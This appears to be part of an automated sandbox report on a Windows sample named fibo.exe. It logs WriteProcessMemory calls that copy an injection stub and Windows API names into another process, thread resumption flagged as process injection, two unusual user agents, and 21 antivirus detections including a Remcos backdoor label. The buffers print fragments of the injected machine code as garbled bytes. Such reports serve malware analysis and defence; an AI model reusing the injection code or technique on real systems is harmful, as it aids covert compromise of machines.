WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00100000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: OpenMutexA base_address: 0x00020000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x00030000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤v base_address: 0x00110000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00120000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Process32NextW base_address: 0x00130000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x00140000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤v base_address: 0x00150000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00160000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: LoadLibraryA base_address: 0x00170000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x00180000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤v base_address: 0x00190000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x001a0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Process32FirstW base_address: 0x00260000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x00270000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤v'& base_address: 0x00280000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00290000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: GetProcAddress base_address: 0x002a0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x002b0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤v+* base_address: 0x002c0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x002d0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: VirtualProtect base_address: 0x002e0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x002f0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤v/. base_address: 0x00300000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00310000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: SetLastError base_address: 0x00320000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x00330000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤v32 base_address: 0x00340000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00450000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: VirtualFree base_address: 0x00460000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x00470000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤vGF base_address: 0x00480000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00490000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: VirtualAlloc base_address: 0x004a0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x004b0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤vKJ base_address: 0x004c0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x004d0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: GetNativeSystemInfo base_address: 0x004e0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x004f0000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤vON base_address: 0x00500000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00510000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: HeapAlloc base_address: 0x00520000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: KERNEL32.dll base_address: 0x00530000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: Õ³w"¤vE¤vSR base_address: 0x00540000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0
WriteProcessMemory Aug. 20, 2021, 9:13 a.m.	buffer: UìÄìVWEð}ì¥¥¥¥¥ÿuøÿUôÿuüPÿUðPÿUì_^å]ÂÀUìÄàSVWùUüØu3ÀEøhÄI¹hØI¹èEÿÿPèGÿÿEèhèI¹hØI¹è-ÿÿPè/ÿÿEähøI¹hØI¹èÿÿPèÿÿEàþu}ðëÎ×ÃèGüÿÿEðUüÃè¢ûÿÿEìjjMàºÐH¹Ãè`üÿÿØÛtjÿSè¦ÿÿEôPSèÿÿEôEøEø_^[å]ÂGetModuleHandleAkernel32.dllGetProcAddressExitThreadUìÄìSEüEüEøE@ü¤EôëUEø@èÑèEìEøÀEðUìJÒr0BEðföÅðtE@ô]øfáÿ·ÉÁMIøEðJuÑEðEøEø+Eü;Eôr [å]Ã base_address: 0x00550000 process_identifier: 1312 process_handle: 0x0000019c	1	1	0

Network activity contains more than one unique useragent (2 events)

process	fibo.exe				useragent	zipo
process	fibo.exe				useragent	aswe

Resumed a suspended thread in a remote process potentially indicative of process injection (4 events)

Time & API	Arguments	Status	Return	Repeated
Process injection	Process 3504 resumed a thread in remote process 3568
Process injection	Process 3840 resumed a thread in remote process 3900
NtResumeThread Aug. 20, 2021, 9:14 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3568	1	0	0
NtResumeThread Aug. 20, 2021, 9:14 a.m.	thread_handle: 0x00000088 suspend_count: 0 process_identifier: 3900	1	0	0

File has been identified by 21 AntiVirus engines on VirusTotal as malicious (21 events)

Lionic	Adware.Win32.Agent.lnJn
Elastic	malicious (high confidence)
McAfee	Artemis!18BD1660BCAB
Cylance	Unsafe
BitDefenderTheta	Gen:NN.ZelphiCO.34088.dLW@ayQhGXai
Cyren	W32/Delf.MBKT-8910
ESET-NOD32	a variant of Win32/GenKryptik.FJGO
APEX	Malicious
Paloalto	generic.ml
Kaspersky	HEUR:Backdoor.Win32.Remcos.gen
Avast	Win32:Malware-gen
McAfee-GW-Edition	BehavesLike.Win32.Generic.tc
Avira	TR/Crypt.XPACK.Gen
Kingsoft	Win32.Hack.Undef.(kcloud)
Microsoft	Trojan:Win32/Wacatac.B!ml
Cynet	Malicious (score: 100)
Malwarebytes	MachineLearning/Anomalous.95%
Rising	Trojan.Generic@ML.84 (RDML:N8+x3Lj+hiET8dmCugDABg)
Fortinet	W32/Kryptik.EPYG!tr
Webroot	W32.Trojan.Gen
AVG	Win32:Malware-gen

fibo.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All